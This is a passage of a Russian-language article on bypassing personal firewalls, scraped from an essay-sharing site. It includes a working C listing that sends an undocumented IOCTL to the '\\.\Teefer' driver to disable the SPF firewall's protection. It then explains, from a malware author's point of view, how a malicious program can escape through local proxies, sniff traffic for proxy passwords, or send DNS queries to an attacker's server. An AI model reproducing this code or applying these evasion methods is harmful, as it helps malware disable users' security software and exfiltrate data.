Преодоление firewall'ов снаружи и изнутри


         

На следующем шаге выполняется следующий


На следующем шаге выполняется следующий код, отключающий режим защиты от сбоев:

DWORD ret; char buffer[8];

DWORD *ptr = (DWORD *)buffer; DWORD *ptr2 = (DWORD *)(buffer + 4);

hDevice = CreateFile("\\\\.\\Teefer", GENERIC_WRITE | GENERIC_READ,

                     FILE_SHARE_READ | FILE_SHARE_WRITE, NULL,

                     OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

if(hDevice == INVALID_HANDLE_VALUE){printf("Open failed\n"); return -1;}

*ptr = 0; *ptr2 = 0;

if(DeviceIoControl(hDevice,0x212094,buffer,8,buffer,8,&ret,0)) printf("Sent.\n");

CloseHandle(hDevice);

Листинг 1 отключение SPF брандмауэра

Другие брандмауэры так же имеют уязвимости, перечень которых можно найти на любом сайте по безопасности. Тем не менее, какой-либо практической ценности эти дыры не представляют, поскольку написать вирус, поддерживающий все типы брандмауэров, довольно затруднительно (а их количество с каждым годом все растет и растет), к тому же однажды обнаруженная дыра через некоторое время затыкается.

Можно, конечно, зайти с другой стороны, и объявить войну пакетным фильтрам — выгрузить драйвера мини-портов, отключить систему фильтрации или обратиться к tcpip.sys/NDIS напрямую, но… все это слишком сложно и непереносимо. То, что работает в NT, не сможет работать в 9x и наоборот. Наибольший интерес представляют универсальные методики, работающие на прикладном уровне и не требующие навыков системного программирования.

Проблему с обратной петлей мы уже упомянули. Если на компьютере установлен Proxy, через него может выходить кто угодно. В частности, HTTP-Proxy обычно висят на 80, 8080 или 8081 порту, поэтому их очень легко обнаружить. Правда, в некоторых случаях они защищены паролем и зловредному приложению приходится запускать снифер или устанавливать свой собственный пакетный фильтр и грабит локальный трафик на предмет поиска паролей.

Если никаких Proxy на компьютере нет, можно попробовать послать DNS-запрос на подконтрольный хакеру сервер (кстати говоря, он может находится и на динамическом IP).

Содержание  Назад  Вперед





Forekc.ru
Рефераты, дипломы, курсовые, выпускные и квалификационные работы, диссертации, учебники, учебные пособия, лекции, методические пособия и рекомендации, программы и курсы обучения, публикации из профильных изданий